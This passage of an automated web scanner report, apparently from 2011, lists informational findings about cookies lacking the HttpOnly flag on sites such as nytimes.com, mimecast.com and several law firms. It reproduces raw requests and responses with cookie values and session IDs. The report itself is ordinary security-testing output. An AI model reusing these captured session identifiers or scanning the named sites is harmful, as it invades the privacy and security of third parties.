The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsc32upj10000c58n7kgpaeo_8i3g/dcs.gif?&dcsdat=1305198204254&dcssip=dealbook.nytimes.com&dcsuri=/2011/05/09/private-equity-has-a-horse-in-this-race/&WT.co_f=173.193.214.243-4039295808.30148852&WT.vt_sid=173.193.214.243-4039295808.30148852.1305198204263&WT.vt_f_tlv=1305112015&WT.tz=-5&WT.bh=6&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Private%20Equity%20Has%20a%20Horse%20in%20the%20Race%20-%20NYTimes.com&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=925x964&WT.fi=Yes&WT.fv=10.2&WT.tv=1.0.7&WT.dl=0&WT.es=dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/&WT.z_fbc=&WT.cg_n=Business&WT.cg_s=Dealbook&WT.z_gpt=Blogs&WT.z_gpst=Blog%20Post&WT.z_puv=normal&WT.z_clmst=By%20PETER%20LATTMAN&WT.z_bn=dealbook&WT.z_pud=20110509&WT.z_nyts=&WT.z_nytd=&WT.z_rmid=27fdc70e4ff84dbef4b4b43a&WT.z_gblc=Private%20Equity;Retail/Leisure&WT.rv=0&WT.z_pudr=3%20Day&WT.z_pyr=2011&WT.mc_ev=&WT.vt_f_tlh=1305112816&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=&WT.vt_f= HTTP/1.1
Host: wt.o.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My00MDM5Mjk1ODA4LjMwMTQ4ODUyAAAAAAAGAAAAmLwAANj0vk3W9L5NF74AAOdtyk3lbcpNNMEAAPFwyk3obcpNDb4AALxuyk3qbcpN+L0AAAVuyk0EbspNCr4AANZwyk2Hb8pNAQAAAHhHAADxcMpN5W3KTQAAAAA-; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305198204263:ss=1305198204263

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 11:04:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My00MDM5Mjk1ODA4LjMwMTQ4ODUyAAAAAAAGAAAAmLwAANj0vk3W9L5NF74AAOdtyk3lbcpNNMEAAPFwyk3obcpNDb4AALxuyk3qbcpN+L0AAMa+y03GvstNCr4AANZwyk2Hb8pNAQAAAHhHAADGvstNxr7LTQAAAAA-; path=/; expires=Sun, 09-May-2021 11:04:38 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

14.140. https://ww3.janus.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ww3.janus.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vj-ww3=3758887084.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.141. http://www.apolloglobal.us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.apolloglobal.us
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

b01a8bbc2b6e57a153d5c05069526f2b=90998af0e63385948cbcf9309ad4789f; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.apolloglobal.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 09:33:08 GMT
Server: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6.4
X-Powered-By: PHP/5.2.3-1ubuntu6.4
Set-Cookie: b01a8bbc2b6e57a153d5c05069526f2b=90998af0e63385948cbcf9309ad4789f; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 12 May 2011 09:33:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

14.142. http://www.apolloglobal.us/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.apolloglobal.us
Path:	/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

b01a8bbc2b6e57a153d5c05069526f2b=a3b2a52a7ef8a8f9e10abb2501b30b93; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php?option=com_content&view=article&id=20&Itemid=34 HTTP/1.1
Host: www.apolloglobal.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

14.143. http://www.beneschlaw.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beneschlaw.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
DefaultCulture=en-US; path=/
NSC_QPE-FHB7374_TibsfQspe=ffffffff09df180d45525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.beneschlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Benesch+Friedlander+Coplan+%26+Aronoff&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Cache-Control: private
Cteonnt-Length: 58767
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000183
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A73
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1115; path=/
Set-Cookie: PortletId=6201; path=/
Set-Cookie: SiteId=1086; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=oubtev45t21ysketzbkids23; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1085&RootPortletID=665&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=Web; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Date: Thu, 12 May 2011 12:19:05 GMT
Set-Cookie: NSC_QPE-FHB7374_TibsfQspe=ffffffff09df180d45525d5f4f58455e445a4a423660;path=/
Content-Length: 58767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Benesc
...[SNIP]...

14.144. http://www.beneschlaw.com/FCWSite/Include/spamproof.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beneschlaw.com
Path:	/FCWSite/Include/spamproof.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
DefaultCulture=en-US; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FCWSite/Include/spamproof.aspx HTTP/1.1
Host: www.beneschlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.beneschlaw.com/
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1115; PortletId=6201; SiteId=1086; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=4pdcdw555vegmp55inbs05nz; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1085&RootPortletID=665&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=Web; ZoneId=7; NSC_QPE-FHB7374_TibsfQspe=ffffffff09df180c45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: private
Cteonnt-Length: 1203
Content-Type: text/javascript; charset=us-ascii
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000183
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A74
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=1086; path=/
Set-Cookie: ZoneId=0; path=/
Date: Thu, 12 May 2011 12:19:06 GMT
Content-Length: 1203

function SendMail(n,d){ document.location.href='mailto:' + n + '@' + d;}

function PrintMail(n,d,m){
   PrintMail(n,d,m,'');
}

function PrintMail(n,d,m,l){
   var ns = n.replace("'","\\\'");
...[SNIP]...

14.145. http://www.csscorp.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.csscorp.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

csscorp=173.193.214.243.1305201371350323; path=/; max-age=315360000; domain=.csscorp.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.146. http://www.digiware.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.digiware.net
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

f165d946d0a4013e03ebd5d7edb21d2c=bqhecm8n2rb4cadkusa5gg38q1; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.147. http://www.gobignetwork.com/funding previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gobignetwork.com
Path:	/funding

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_referrer=||||http://www.gobignetwork.com/funding||||5/12/2011 7:01 AM; expires=Sun, 06-May-2012 11:01:18 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /funding HTTP/1.1
Host: www.gobignetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

14.148. http://www.mimecast.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mimecast.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MimecastcomRegion=North America; expires=Fri, 11-May-2012 12:37:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ASP.NET_SessionId=lceka2nmzsc44jouj2at51w5; MimecastcomTracker=id=1762891

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 11 May 2011 12:37:49 GMT
Vary: Accept-Encoding
Set-Cookie: MimecastcomRegion=North America; expires=Fri, 11-May-2012 12:37:49 GMT; path=/
Date: Thu, 12 May 2011 12:37:50 GMT
Content-Length: 61607

...

<!DOCTYPE HTML>
<html>
<head id="ctl00_Head1"><meta charset="utf-8" /><title>Mimecast Email Management | Unified Email Management Solutions</title>
<META NAME="DESCRIPTION" CONTENT="Mimecast
...[SNIP]...

14.149. http://www.mimecast.com/About-us/Contact-us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mimecast.com
Path:	/About-us/Contact-us/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MimecastcomRegion=North America; expires=Fri, 11-May-2012 12:37:48 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /About-us/Contact-us/ HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ASP.NET_SessionId=lceka2nmzsc44jouj2at51w5; MimecastcomTracker=id=1762891

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 11 May 2011 12:37:48 GMT
Vary: Accept-Encoding
Set-Cookie: MimecastcomRegion=North America; expires=Fri, 11-May-2012 12:37:48 GMT; path=/
Date: Thu, 12 May 2011 12:37:48 GMT
Content-Length: 106303

...

<!DOCTYPE HTML>
<html>
<head id="ctl00_ctl00_Head1"><meta charset="utf-8" /><title>Contact Mimecast | Product Inquiry | Demo Request</title>
<META NAME="DESCRIPTION" CONTENT="If you have an i
...[SNIP]...

14.150. http://www.mimecast.com/What-we-offer/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mimecast.com
Path:	/What-we-offer/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MimecastcomRegion=North America; expires=Fri, 11-May-2012 12:37:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /What-we-offer/ HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ASP.NET_SessionId=jog5wjepoenulrevfy0j33fx; MimecastcomTracker=id=1762893

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 11 May 2011 12:37:50 GMT
Vary: Accept-Encoding
Set-Cookie: MimecastcomRegion=North America; expires=Fri, 11-May-2012 12:37:50 GMT; path=/
Date: Thu, 12 May 2011 12:37:50 GMT
Content-Length: 66702

...

<!DOCTYPE HTML>
<html>
<head id="ctl00_Head1"><meta charset="utf-8" /><title>Email Management & Email Compliance Solutions and more</title>
<META NAME="DESCRIPTION" CONTENT="Mimecast offers e
...[SNIP]...

14.151. http://www.moritthock.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moritthock.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

exp_last_visit=989860894; expires=Fri, 11-May-2012 12:21:34 GMT; path=/
exp_last_activity=1305220894; expires=Fri, 11-May-2012 12:21:34 GMT; path=/
exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.moritthock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Moritt+Hock+Hamroff+%26+Horowitz&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

14.152. http://www.moritthock.com/index.php/representative_transactions previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moritthock.com
Path:	/index.php/representative_transactions

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

exp_last_activity=1305221434; expires=Fri, 11-May-2012 12:30:34 GMT; path=/
exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A29%3A%22%2Frepresentative_transactions%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.php/representative_transactions HTTP/1.1
Host: www.moritthock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.moritthock.com/
Cookie: exp_last_visit=989860893; exp_last_activity=1305220893; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=175020734.1039693598.1305202900.1305202900.1305202900.1; __utmb=175020734.1.10.1305202900; __utmc=175020734; __utmz=175020734.1305202900.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Moritt%20Hock%20Hamroff%20%26%20Horowitz

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:30:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: exp_last_activity=1305221434; expires=Fri, 11-May-2012 12:30:34 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A29%3A%22%2Frepresentative_transactions%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 12:30:35 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 39384

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Representative Transactions
...[SNIP]...

14.153. http://www.moritthock.com/index.php/representative_transactions/transaction/counseling_developers_of_luxury_housing_in_nyc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moritthock.com
Path:	/index.php/representative_transactions/transaction/counseling_developers_of_luxury_housing_in_nyc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

exp_last_activity=1305221466; expires=Fri, 11-May-2012 12:31:06 GMT; path=/
exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A88%3A%22%2Frepresentative_transactions%2Ftransaction%2Fcounseling_developers_of_luxury_housing_in_nyc%2F%22%3Bi%3A1%3Bs%3A29%3A%22%2Frepresentative_transactions%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.php/representative_transactions/transaction/counseling_developers_of_luxury_housing_in_nyc HTTP/1.1
Host: www.moritthock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.moritthock.com/index.php/representative_transactions
Cookie: exp_last_visit=989860893; exp_last_activity=1305221430; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A29%3A%22%2Frepresentative_transactions%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=175020734.1039693598.1305202900.1305202900.1305202900.1; __utmb=175020734.2.10.1305202900; __utmc=175020734; __utmz=175020734.1305202900.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Moritt%20Hock%20Hamroff%20%26%20Horowitz

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:31:05 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: exp_last_activity=1305221466; expires=Fri, 11-May-2012 12:31:06 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A88%3A%22%2Frepresentative_transactions%2Ftransaction%2Fcounseling_developers_of_luxury_housing_in_nyc%2F%22%3Bi%3A1%3Bs%3A29%3A%22%2Frepresentative_transactions%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 12:31:06 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 12752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Manhattan Real Estate Law |
...[SNIP]...

14.154. http://www.nytimes.com/adx/bin/adx_remote.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nytimes.com
Path:	/adx/bin/adx_remote.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

adxcl=t*26edd=4e32303f:1305112022; expires=Friday, 11-May-2012 11:03:02 GMT; path=/; domain=.nytimes.com
adxcs=si=0:1|s*192f7=0:1; path=/; domain=.nytimes.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.155. http://www.porterwright.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.porterwright.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
DefaultCulture=en-US; path=/
PortletId=50001; path=/
NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.porterwright.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Porter+Wright+Morris+%26+Arthur&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:50 GMT
Server: Microsoft-IIS/6.0
x-geoloc:02
x-client:000896
x-apptype:01
x-prodtype:01
x-public:1
x-redirect:0
x-occurrence:01
x-server:EG-HUBRD-A67
X-UA-Compatible:IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1160; path=/
Set-Cookie: PortletId=50001; path=/
Set-Cookie: SiteId=1111; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=khxniv2bhbjl4s55zz4g20eb; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1097&RootPortletID=676&RootPortletH4AssetID=383&LicenseKey= &Name=Web Framework&URL=websites; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 21792
Set-Cookie: NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660;path=/
Content-Length: 21792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta name="descri
...[SNIP]...

14.156. http://www.porterwright.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.porterwright.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

DefaultCulture=en-US; path=/
